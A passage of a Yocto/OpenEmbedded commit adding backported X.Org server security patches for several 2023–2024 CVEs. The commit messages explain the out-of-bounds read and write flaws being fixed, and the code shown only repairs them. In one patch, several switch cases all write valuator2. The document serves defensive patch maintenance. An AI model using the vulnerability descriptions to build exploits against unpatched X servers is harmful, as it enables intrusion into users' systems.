+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ Xi/exevents.c | 12 ++++++------
+ dix/devices.c | 10 ++++++++++
+ 2 files changed, 16 insertions(+), 6 deletions(-)
+
+diff --git a/Xi/exevents.c b/Xi/exevents.c
+index dcd4efb3bc..54ea11a938 100644
+--- a/Xi/exevents.c
++++ b/Xi/exevents.c
+@@ -611,13 +611,13 @@ DeepCopyPointerClasses(DeviceIntPtr from, DeviceIntPtr to)
+ }
+
+ if (from->button->xkb_acts) {
+- if (!to->button->xkb_acts) {
+- to->button->xkb_acts = calloc(1, sizeof(XkbAction));
+- if (!to->button->xkb_acts)
+- FatalError("[Xi] not enough memory for xkb_acts.\n");
+- }
++ size_t maxbuttons = max(to->button->numButtons, from->button->numButtons);
++ to->button->xkb_acts = xnfreallocarray(to->button->xkb_acts,
++ maxbuttons,
++ sizeof(XkbAction));
++ memset(to->button->xkb_acts, 0, maxbuttons * sizeof(XkbAction));
+ memcpy(to->button->xkb_acts, from->button->xkb_acts,
+- sizeof(XkbAction));
++ from->button->numButtons * sizeof(XkbAction));
+ }
+ else {
+ free(to->button->xkb_acts);
+diff --git a/dix/devices.c b/dix/devices.c
+index b063128df0..3f3224d626 100644
+--- a/dix/devices.c
++++ b/dix/devices.c
+@@ -2539,6 +2539,8 @@ RecalculateMasterButtons(DeviceIntPtr slave)
+
+ if (master->button && master->button->numButtons != maxbuttons) {
+ int i;
++ int last_num_buttons = master->button->numButtons;
++
+ DeviceChangedEvent event = {
+ .header = ET_Internal,
+ .type = ET_DeviceChanged,
+@@ -2549,6 +2551,14 @@ RecalculateMasterButtons(DeviceIntPtr slave)
+ };
+
+ master->button->numButtons = maxbuttons;
++ if (last_num_buttons < maxbuttons) {
++ master->button->xkb_acts = xnfreallocarray(master->button->xkb_acts,
++ maxbuttons,
++ sizeof(XkbAction));
++ memset(&master->button->xkb_acts[last_num_buttons],
++ 0,
++ (maxbuttons - last_num_buttons) * sizeof(XkbAction));
++ }
+
+ memcpy(&event.buttons.names, master->button->labels, maxbuttons *
+ sizeof(Atom));
+--
+GitLab
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6478.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6478.patch
new file mode 100644
index 0000000000..6392eae3f8
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6478.patch
@@ -0,0 +1,63 @@
+From 14f480010a93ff962fef66a16412fafff81ad632 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Mon, 27 Nov 2023 16:27:49 +1000
+Subject: [PATCH] randr: avoid integer truncation in length check of
+ ProcRRChange*Property
+
+Affected are ProcRRChangeProviderProperty and ProcRRChangeOutputProperty.
+See also xserver@8f454b79 where this same bug was fixed for the core
+protocol and XI.
+
+This fixes an OOB read and the resulting information disclosure.
+
+Length calculation for the request was clipped to a 32-bit integer. With
+the correct stuff->nUnits value the expected request size was
+truncated, passing the REQUEST_FIXED_SIZE check.
+
+The server then proceeded with reading at least stuff->num_items bytes
+(depending on stuff->format) from the request and stuffing whatever it
+finds into the property. In the process it would also allocate at least
+stuff->nUnits bytes, i.e. 4GB.
+
+CVE-2023-6478, ZDI-CAN-22561
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/14f480010a93ff962fef66a16412fafff81ad632]
+CVE: CVE-2023-6478
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ randr/rrproperty.c | 2 +-
+ randr/rrproviderproperty.c | 2 +-
+ 2 files changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/randr/rrproperty.c b/randr/rrproperty.c
+index 25469f57b2..c4fef8a1f6 100644
+--- a/randr/rrproperty.c
++++ b/randr/rrproperty.c
+@@ -530,7 +530,7 @@ ProcRRChangeOutputProperty(ClientPtr client)
+ char format, mode;
+ unsigned long len;
+ int sizeInBytes;
+- int totalSize;
++ uint64_t totalSize;
+ int err;
+
+ REQUEST_AT_LEAST_SIZE(xRRChangeOutputPropertyReq);
+diff --git a/randr/rrproviderproperty.c b/randr/rrproviderproperty.c
+index b79c17f9bf..90c5a9a933 100644
+--- a/randr/rrproviderproperty.c
++++ b/randr/rrproviderproperty.c
+@@ -498,7 +498,7 @@ ProcRRChangeProviderProperty(ClientPtr client)
+ char format, mode;
+ unsigned long len;
+ int sizeInBytes;
+- int totalSize;
++ uint64_t totalSize;
+ int err;
+
+ REQUEST_AT_LEAST_SIZE(xRRChangeProviderPropertyReq);
+--
+GitLab
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6816.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6816.patch
new file mode 100644
index 0000000000..0bfff268e7
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6816.patch
@@ -0,0 +1,55 @@
+From 9e2ecb2af8302dedc49cb6a63ebe063c58a9e7e3 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Thu, 14 Dec 2023 11:29:49 +1000
+Subject: [PATCH] dix: allocate enough space for logical button maps
+
+Both DeviceFocusEvent and the XIQueryPointer reply contain a bit for
+each logical button currently down. Since buttons can be arbitrarily mapped
+to anything up to 255 make sure we have enough bits for the maximum mapping.
+
+CVE-2023-6816, ZDI-CAN-22664, ZDI-CAN-22665
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/9e2ecb2af8302dedc49cb6a63ebe063c58a9e7e3]
+CVE: CVE-2023-6816
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ Xi/xiquerypointer.c | 3 +--
+ dix/enterleave.c | 5 +++--
+ 2 files changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/Xi/xiquerypointer.c b/Xi/xiquerypointer.c
+index 5b77b1a444..2b05ac5f39 100644
+--- a/Xi/xiquerypointer.c
++++ b/Xi/xiquerypointer.c
+@@ -149,8 +149,7 @@ ProcXIQueryPointer(ClientPtr client)
+ if (pDev->button) {
+ int i;
+
+- rep.buttons_len =
+- bytes_to_int32(bits_to_bytes(pDev->button->numButtons));
++ rep.buttons_len = bytes_to_int32(bits_to_bytes(256)); /* button map up to 255 */
+ rep.length += rep.buttons_len;
+ buttons = calloc(rep.buttons_len, 4);
+ if (!buttons)
+diff --git a/dix/enterleave.c b/dix/enterleave.c
+index 867ec74363..ded8679d76 100644
+--- a/dix/enterleave.c
++++ b/dix/enterleave.c
+@@ -784,8 +784,9 @@ DeviceFocusEvent(DeviceIntPtr dev, int type, int mode, int detail,
+
+ mouse = IsFloating(dev) ? dev : GetMaster(dev, MASTER_POINTER);
+
+- /* XI 2 event */
+- btlen = (mouse->button) ? bits_to_bytes(mouse->button->numButtons) : 0;
++ /* XI 2 event contains the logical button map - maps are CARD8
++ * so we need 256 bits for the possibly maximum mapping */
++ btlen = (mouse->button) ? bits_to_bytes(256) : 0;
+ btlen = bytes_to_int32(btlen);
+ len = sizeof(xXIFocusInEvent) + btlen * 4;
+
+--
+GitLab
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-1.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-1.patch
new file mode 100644
index 0000000000..80ebc64e59
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-1.patch
@@ -0,0 +1,87 @@
+From ece23be888a93b741aa1209d1dbf64636109d6a5 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Mon, 18 Dec 2023 14:27:50 +1000
+Subject: [PATCH] dix: Allocate sufficient xEvents for our DeviceStateNotify
+
+If a device has both a button class and a key class and numButtons is
+zero, we can get an OOB write due to event under-allocation.
+
+This function seems to assume a device has either keys or buttons, not
+both. It has two virtually identical code paths, both of which assume
+they're applying to the first event in the sequence.
+
+A device with both a key and button class triggered a logic bug - only
+one xEvent was allocated but the deviceStateNotify pointer was pushed on
+once per type. So effectively this logic code:
+
+ int count = 1;
+ if (button && nbuttons > 32) count++;
+ if (key && nbuttons > 0) count++;
+ if (key && nkeys > 32) count++; // this is basically always true
+ // count is at 2 for our keys + zero button device
+
+ ev = alloc(count * sizeof(xEvent));
+ FixDeviceStateNotify(ev);
+ if (button)
+ FixDeviceStateNotify(ev++);
+ if (key)
+ FixDeviceStateNotify(ev++); // santa drops into the wrong chimney here
+
+If the device has more than 3 valuators, the OOB is pushed back - we're
+off by one so it will happen when the last deviceValuator event is
+written instead.
+
+Fix this by allocating the maximum number of events we may allocate.
+Note that the current behavior is not protocol-correct anyway, this
+patch fixes only the allocation issue.
+
+Note that this issue does not trigger if the device has at least one
+button. While the server does not prevent a button class with zero
+buttons, it is very unlikely.
+
+CVE-2024-0229, ZDI-CAN-22678
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/ece23be888a93b741aa1209d1dbf64636109d6a5]
+CVE: CVE-2024-0229
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ dix/enterleave.c | 6 +++---
+ 1 file changed, 3 insertions(+), 3 deletions(-)
+
+diff --git a/dix/enterleave.c b/dix/enterleave.c
+index ded8679d76..17964b00a4 100644
+--- a/dix/enterleave.c
++++ b/dix/enterleave.c
+@@ -675,7 +675,8 @@ static void
+ DeliverStateNotifyEvent(DeviceIntPtr dev, WindowPtr win)
+ {
+ int evcount = 1;
+- deviceStateNotify *ev, *sev;
++ deviceStateNotify sev[6 + (MAX_VALUATORS + 2)/3];
++ deviceStateNotify *ev;
+ deviceKeyStateNotify *kev;
+ deviceButtonStateNotify *bev;
+
+@@ -714,7 +715,7 @@ DeliverStateNotifyEvent(DeviceIntPtr dev, WindowPtr win)
+ }
+ }
+
+- sev = ev = xallocarray(evcount, sizeof(xEvent));
++ ev = sev;
+ FixDeviceStateNotify(dev, ev, NULL, NULL, NULL, first);
+
+ if (b != NULL) {
+@@ -770,7 +771,6 @@ DeliverStateNotifyEvent(DeviceIntPtr dev, WindowPtr win)
+
+ DeliverEventsToWindow(dev, win, (xEvent *) sev, evcount,
+ DeviceStateNotifyMask, NullGrab);
+- free(sev);
+ }
+
+ void
+--
+GitLab
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-2.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-2.patch
new file mode 100644
index 0000000000..65df74376b
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-2.patch
@@ -0,0 +1,221 @@
+From 219c54b8a3337456ce5270ded6a67bcde53553d5 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Mon, 18 Dec 2023 12:26:20 +1000
+Subject: [PATCH] dix: fix DeviceStateNotify event calculation
+
+The previous code only made sense if one considers buttons and keys to
+be mutually exclusive on a device. That is not necessarily true, causing
+a number of issues.
+
+This function allocates and fills in the number of xEvents we need to
+send the device state down the wire. This is split across multiple
+32-byte devices including one deviceStateNotify event and optional
+deviceKeyStateNotify, deviceButtonStateNotify and (possibly multiple)
+deviceValuator events.
+
+The previous behavior would instead compose a sequence
+of [state, buttonstate, state, keystate, valuator...]. This is not
+protocol correct, and on top of that made the code extremely convoluted.
+
+Fix this by streamlining: add both button and key into the deviceStateNotify
+and then append the key state and button state, followed by the
+valuators. Finally, the deviceValuator events contain up to 6 valuators
+per event but we only ever sent through 3 at a time. Let's double that
+troughput.
+
+CVE-2024-0229, ZDI-CAN-22678
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/219c54b8a3337456ce5270ded6a67bcde53553d5]
+CVE: CVE-2024-0229
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ dix/enterleave.c | 121 ++++++++++++++++++++---------------------------
+ 1 file changed, 52 insertions(+), 69 deletions(-)
+
+diff --git a/dix/enterleave.c b/dix/enterleave.c
+index 17964b00a4..7b7ba1098b 100644
+--- a/dix/enterleave.c
++++ b/dix/enterleave.c
+@@ -615,9 +615,15 @@ FixDeviceValuator(DeviceIntPtr dev, deviceValuator * ev, ValuatorClassPtr v,
+
+ ev->type = DeviceValuator;
+ ev->deviceid = dev->id;
+- ev->num_valuators = nval < 3 ? nval : 3;
++ ev->num_valuators = nval < 6 ? nval : 6;
+ ev->first_valuator = first;
+ switch (ev->num_valuators) {
++ case 6:
++ ev->valuator2 = v->axisVal[first + 5];
++ case 5:
++ ev->valuator2 = v->axisVal[first + 4];
++ case 4:
++ ev->valuator2 = v->axisVal[first + 3];
+ case 3:
+ ev->valuator2 = v->axisVal[first + 2];
+ case 2:
+@@ -626,7 +632,6 @@ FixDeviceValuator(DeviceIntPtr dev, deviceValuator * ev, ValuatorClassPtr v,
+ ev->valuator0 = v->axisVal[first];
+ break;
+ }
+- first += ev->num_valuators;
+ }
+
+ static void
+@@ -646,7 +651,7 @@ FixDeviceStateNotify(DeviceIntPtr dev, deviceStateNotify * ev, KeyClassPtr k,
+ ev->num_buttons = b->numButtons;
+ memcpy((char *) ev->buttons, (char *) b->down, 4);
+ }
+- else if (k) {
++ if (k) {
+ ev->classes_reported |= (1 << KeyClass);
+ ev->num_keys = k->xkbInfo->desc->max_key_code -
+ k->xkbInfo->desc->min_key_code;
+@@ -670,15 +675,26 @@ FixDeviceStateNotify(DeviceIntPtr dev, deviceStateNotify * ev, KeyClassPtr k,
+ }
+ }
+
+-
++/**
++ * The device state notify event is split across multiple 32-byte events.
++ * The first one contains the first 32 button state bits, the first 32
++ * key state bits, and the first 3 valuator values.
++ *
++ * If a device has more than that, the server sends out:
++ * - one deviceButtonStateNotify for buttons 32 and above
++ * - one deviceKeyStateNotify for keys 32 and above
++ * - one deviceValuator event per 6 valuators above valuator 4
++ *
++ * All events but the last one have the deviceid binary ORed with MORE_EVENTS,
++ */
+ static void
+ DeliverStateNotifyEvent(DeviceIntPtr dev, WindowPtr win)
+ {
++ /* deviceStateNotify, deviceKeyStateNotify, deviceButtonStateNotify
++ * and one deviceValuator for each 6 valuators */
++ deviceStateNotify sev[3 + (MAX_VALUATORS + 6)/6];
+ int evcount = 1;
+- deviceStateNotify sev[6 + (MAX_VALUATORS + 2)/3];
+- deviceStateNotify *ev;
+- deviceKeyStateNotify *kev;
+- deviceButtonStateNotify *bev;
++ deviceStateNotify *ev = sev;
+
+ KeyClassPtr k;
+ ButtonClassPtr b;
+@@ -691,82 +707,49 @@ DeliverStateNotifyEvent(DeviceIntPtr dev, WindowPtr win)
+
+ if ((b = dev->button) != NULL) {
+ nbuttons = b->numButtons;
+- if (nbuttons > 32)
++ if (nbuttons > 32) /* first 32 are encoded in deviceStateNotify */
+ evcount++;
+ }
+ if ((k = dev->key) != NULL) {
+ nkeys = k->xkbInfo->desc->max_key_code - k->xkbInfo->desc->min_key_code;
+- if (nkeys > 32)
++ if (nkeys > 32) /* first 32 are encoded in deviceStateNotify */
+ evcount++;
+- if (nbuttons > 0) {
+- evcount++;
+- }
+ }
+ if ((v = dev->valuator) != NULL) {
+ nval = v->numAxes;
+-
+- if (nval > 3)
+- evcount++;
+- if (nval > 6) {
+- if (!(k && b))
+- evcount++;
+- if (nval > 9)
+- evcount += ((nval - 7) / 3);
+- }
++ /* first three are encoded in deviceStateNotify, then
++ * it's 6 per deviceValuator event */
++ evcount += ((nval - 3) + 6)/6;
+ }
+
+- ev = sev;
+- FixDeviceStateNotify(dev, ev, NULL, NULL, NULL, first);
+-
+- if (b != NULL) {
+- FixDeviceStateNotify(dev, ev++, NULL, b, v, first);
+- first += 3;
+- nval -= 3;
+- if (nbuttons > 32) {
+- (ev - 1)->deviceid |= MORE_EVENTS;
+- bev = (deviceButtonStateNotify *) ev++;
+- bev->type = DeviceButtonStateNotify;
+- bev->deviceid = dev->id;
+- memcpy((char *) &bev->buttons[4], (char *) &b->down[4],
+- DOWN_LENGTH - 4);
+- }
+- if (nval > 0) {
+- (ev - 1)->deviceid |= MORE_EVENTS;
+- FixDeviceValuator(dev, (deviceValuator *) ev++, v, first);
+- first += 3;
+- nval -= 3;
+- }
++ BUG_RETURN(evcount <= ARRAY_SIZE(sev));
++
++ FixDeviceStateNotify(dev, ev, k, b, v, first);
++
++ if (b != NULL && nbuttons > 32) {
++ deviceButtonStateNotify *bev = (deviceButtonStateNotify *) ++ev;
++ (ev - 1)->deviceid |= MORE_EVENTS;
++ bev->type = DeviceButtonStateNotify;
++ bev->deviceid = dev->id;
++ memcpy((char *) &bev->buttons[4], (char *) &b->down[4],
++ DOWN_LENGTH - 4);
+ }
+
+- if (k != NULL) {
+- FixDeviceStateNotify(dev, ev++, k, NULL, v, first);
+- first += 3;
+- nval -= 3;
+- if (nkeys > 32) {
+- (ev - 1)->deviceid |= MORE_EVENTS;
+- kev = (deviceKeyStateNotify *) ev++;
+- kev->type = DeviceKeyStateNotify;
+- kev->deviceid = dev->id;
+- memmove((char *) &kev->keys[0], (char *) &k->down[4], 28);
+- }
+- if (nval > 0) {
+- (ev - 1)->deviceid |= MORE_EVENTS;
+- FixDeviceValuator(dev, (deviceValuator *) ev++, v, first);
+- first += 3;
+- nval -= 3;
+- }
++ if (k != NULL && nkeys > 32) {
++ deviceKeyStateNotify *kev = (deviceKeyStateNotify *) ++ev;
++ (ev - 1)->deviceid |= MORE_EVENTS;
++ kev->type = DeviceKeyStateNotify;
++ kev->deviceid = dev->id;
++ memmove((char *) &kev->keys[0], (char *) &k->down[4], 28);
+ }
+
++ first = 3;
++ nval -= 3;
+ while (nval > 0) {
+- FixDeviceStateNotify(dev, ev++, NULL, NULL, v, first);
+- first += 3;
+- nval -= 3;
+- if (nval > 0) {
+- (ev - 1)->deviceid |= MORE_EVENTS;
+- FixDeviceValuator(dev, (deviceValuator *) ev++, v, first);
+- first += 3;
+- nval -= 3;
+- }
++ ev->deviceid |= MORE_EVENTS;
++ FixDeviceValuator(dev, (deviceValuator *) ++ev, v, first);
++ first += 6;
++ nval -= 6;
+ }
+
+ DeliverEventsToWindow(dev, win, (xEvent *) sev, evcount,
+--
+GitLab
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-3.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-3.patch
new file mode 100644
index 0000000000..742c122fa8
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-3.patch
@@ -0,0 +1,41 @@
+From df3c65706eb169d5938df0052059f3e0d5981b74 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Thu, 21 Dec 2023 13:48:10 +1000
+Subject: [PATCH] Xi: when creating a new ButtonClass, set the number of
+ buttons
+
+There's a racy sequence where a master device may copy the button class
+from the slave, without ever initializing numButtons. This leads to a
+device with zero buttons but a button class which is invalid.
+
+Let's copy the numButtons value from the source - by definition if we
+don't have a button class yet we do not have any other slave devices
+with more than this number of buttons anyway.
+
+CVE-2024-0229, ZDI-CAN-22678
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/df3c65706eb169d5938df0052059f3e0d5981b74]
+CVE: CVE-2024-0229
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ Xi/exevents.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/Xi/exevents.c b/Xi/exevents.c
+index 54ea11a938..e161714682 100644
+--- a/Xi/exevents.c
++++ b/Xi/exevents.c
+@@ -605,6 +605,7 @@ DeepCopyPointerClasses(DeviceIntPtr from, DeviceIntPtr to)
+ to->button = calloc(1, sizeof(ButtonClassRec));
+ if (!to->button)
+ FatalError("[Xi] no memory for class shift.\n");
++ to->button->numButtons = from->button->numButtons;
+ }
+ else
+ classes->button = NULL;
+--
+GitLab
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-4.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-4.patch
new file mode 100644
index 0000000000..d1a6214793
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-4.patch
@@ -0,0 +1,45 @@
+From 37539cb0bfe4ed96d4499bf371e6b1a474a740fe Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Thu, 21 Dec 2023 14:10:11 +1000
+Subject: [PATCH] Xi: require a pointer and keyboard device for
+ XIAttachToMaster
+
+If we remove a master device and specify which other master devices
+attached slaves should be returned to, enforce that those two are
+indeeed a pointer and a keyboard.
+
+Otherwise we can try to attach the keyboards to pointers and vice versa,
+leading to possible crashes later.
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/37539cb0bfe4ed96d4499bf371e6b1a474a740fe]
+CVE: CVE-2024-0229
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ Xi/xichangehierarchy.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/Xi/xichangehierarchy.c b/Xi/xichangehierarchy.c
+index 504defe566..d2d985848d 100644
+--- a/Xi/xichangehierarchy.c
++++ b/Xi/xichangehierarchy.c
+@@ -270,7 +270,7 @@ remove_master(ClientPtr client, xXIRemoveMasterInfo * r, int flags[MAXDEVICES])
+ if (rc != Success)
+ goto unwind;
+
+- if (!IsMaster(newptr)) {
++ if (!IsMaster(newptr) || !IsPointerDevice(newptr)) {
+ client->errorValue = r->return_pointer;
+ rc = BadDevice;
+ goto unwind;
+@@ -281,7 +281,7 @@ remove_master(ClientPtr client, xXIRemoveMasterInfo * r, int flags[MAXDEVICES])
+ if (rc != Success)
+ goto unwind;
+
+- if (!IsMaster(newkeybd)) {
++ if (!IsMaster(newkeybd) || !IsKeyboardDevice(newkeybd)) {
+ client->errorValue = r->return_keyboard;
+ rc = BadDevice;
+ goto unwind;
+--
+GitLab
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0408.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0408.patch
new file mode 100644
index 0000000000..c8f75d8a7e
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0408.patch
@@ -0,0 +1,64 @@
+From e5e8586a12a3ec915673edffa10dc8fe5e15dac3 Mon Sep 17 00:00:00 2001
+From: Olivier Fourdan <ofourdan@redhat.com>
+Date: Wed, 6 Dec 2023 12:09:41 +0100
+Subject: [PATCH] glx: Call XACE hooks on the GLX buffer
+
+The XSELINUX code will label resources at creation by checking the
+access mode. When the access mode is DixCreateAccess, it will call the
+function to label the new resource SELinuxLabelResource().
+
+However, GLX buffers do not go through the XACE hooks when created,
+hence leaving the resource actually unlabeled.
+
+When, later, the client tries to create another resource using that
+drawable (like a GC for example), the XSELINUX code would try to use
+the security ID of that object which has never been labeled, get a NULL
+pointer and crash when checking whether the requested permissions are
+granted for subject security ID.
+
+To avoid the issue, make sure to call the XACE hooks when creating the
+GLX buffers.
+
+Credit goes to Donn Seeley <donn@xmission.com> for providing the patch.
+
+CVE-2024-0408
+
+Signed-off-by: Olivier Fourdan <ofourdan@redhat.com>
+Acked-by: Peter Hutterer <peter.hutterer@who-t.net>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/e5e8586a12a3ec915673edffa10dc8fe5e15dac3]
+CVE: CVE-2024-0408
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ glx/glxcmds.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+diff --git a/glx/glxcmds.c b/glx/glxcmds.c
+index fc26a2e345..1e46d0c723 100644
+--- a/glx/glxcmds.c
++++ b/glx/glxcmds.c
+@@ -48,6 +48,7 @@
+ #include "indirect_util.h"
+ #include "protocol-versions.h"
+ #include "glxvndabi.h"
++#include "xace.h"
+
+ static char GLXServerVendorName[] = "SGI";
+
+@@ -1392,6 +1393,13 @@ DoCreatePbuffer(ClientPtr client, int screenNum, XID fbconfigId,
+ if (!pPixmap)
+ return BadAlloc;
+
++ err = XaceHook(XACE_RESOURCE_ACCESS, client, glxDrawableId, RT_PIXMAP,
++ pPixmap, RT_NONE, NULL, DixCreateAccess);
++ if (err != Success) {
++ (*pGlxScreen->pScreen->DestroyPixmap) (pPixmap);
++ return err;
++ }
++
+ /* Assign the pixmap the same id as the pbuffer and add it as a
+ * resource so it and the DRI2 drawable will be reclaimed when the
+ * pbuffer is destroyed. */
+--
+GitLab
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0409.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0409.patch
new file mode 100644
index 0000000000..9763e0b562
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0409.patch
@@ -0,0 +1,46 @@
+From 2ef0f1116c65d5cb06d7b6d83f8a1aea702c94f7 Mon Sep 17 00:00:00 2001
+From: Olivier Fourdan <ofourdan@redhat.com>
+Date: Wed, 6 Dec 2023 11:51:56 +0100
+Subject: [PATCH] ephyr,xwayland: Use the proper private key for cursor
+
+The cursor in DIX is actually split in two parts, the cursor itself and
+the cursor bits, each with their own devPrivates.
+
+The cursor itself includes the cursor bits, meaning that the cursor bits
+devPrivates in within structure of the cursor.
+
+Both Xephyr and Xwayland were using the private key for the cursor bits
+to store the data for the cursor, and when using XSELINUX which comes
+with its own special devPrivates, the data stored in that cursor bits'
+devPrivates would interfere with the XSELINUX devPrivates data and the
+SELINUX security ID would point to some other unrelated data, causing a
+crash in the XSELINUX code when trying to (re)use the security ID.
+
+CVE-2024-0409
+
+Signed-off-by: Olivier Fourdan <ofourdan@redhat.com>
+Reviewed-by: Peter Hutterer <peter.hutterer@who-t.net>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/2ef0f1116c65d5cb06d7b6d83f8a1aea702c94f7]
+CVE: CVE-2024-0409
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ hw/kdrive/ephyr/ephyrcursor.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/hw/kdrive/ephyr/ephyrcursor.c b/hw/kdrive/ephyr/ephyrcursor.c
+index f991899..3f192d0 100644
+--- a/hw/kdrive/ephyr/ephyrcursor.c
++++ b/hw/kdrive/ephyr/ephyrcursor.c
+@@ -246,7 +246,7 @@ miPointerSpriteFuncRec EphyrPointerSpriteFuncs = {
+ Bool
+ ephyrCursorInit(ScreenPtr screen)
+ {
+- if (!dixRegisterPrivateKey(&ephyrCursorPrivateKey, PRIVATE_CURSOR_BITS,
++ if (!dixRegisterPrivateKey(&ephyrCursorPrivateKey, PRIVATE_CURSOR,
+ sizeof(ephyrCursorRec)))
+ return FALSE;
+
+--
+2.25.1
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21885.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21885.patch
new file mode 100644
index 0000000000..7c8fbcc3ec
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21885.patch
@@ -0,0 +1,113 @@
+From 4a5e9b1895627d40d26045bd0b7ef3dce503cbd1 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Thu, 4 Jan 2024 10:01:24 +1000
+Subject: [PATCH] Xi: flush hierarchy events after adding/removing master
+ devices
+
+The `XISendDeviceHierarchyEvent()` function allocates space to store up
+to `MAXDEVICES` (256) `xXIHierarchyInfo` structures in `info`.
+
+If a device with a given ID was removed and a new device with the same
+ID added both in the same operation, the single device ID will lead to
+two info structures being written to `info`.
+
+Since this case can occur for every device ID at once, a total of two
+times `MAXDEVICES` info structures might be written to the allocation.
+
+To avoid it, once one add/remove master is processed, send out the
+device hierarchy event for the current state and continue. That event
+thus only ever has exactly one of either added/removed in it (and
+optionally slave attached/detached).
+
+CVE-2024-21885, ZDI-CAN-22744
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/4a5e9b1895627d40d26045bd0b7ef3dce503cbd1]
+CVE: CVE-2024-21885
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ Xi/xichangehierarchy.c | 27 ++++++++++++++++++++++-----
+ 1 file changed, 22 insertions(+), 5 deletions(-)
+
+diff --git a/Xi/xichangehierarchy.c b/Xi/xichangehierarchy.c
+index d2d985848d..72d00451e3 100644
+--- a/Xi/xichangehierarchy.c
++++ b/Xi/xichangehierarchy.c
+@@ -416,6 +416,11 @@ ProcXIChangeHierarchy(ClientPtr client)
+ size_t len; /* length of data remaining in request */
+ int rc = Success;
+ int flags[MAXDEVICES] = { 0 };
++ enum {
++ NO_CHANGE,
++ FLUSH,
++ CHANGED,
++ } changes = NO_CHANGE;
+
+ REQUEST(xXIChangeHierarchyReq);
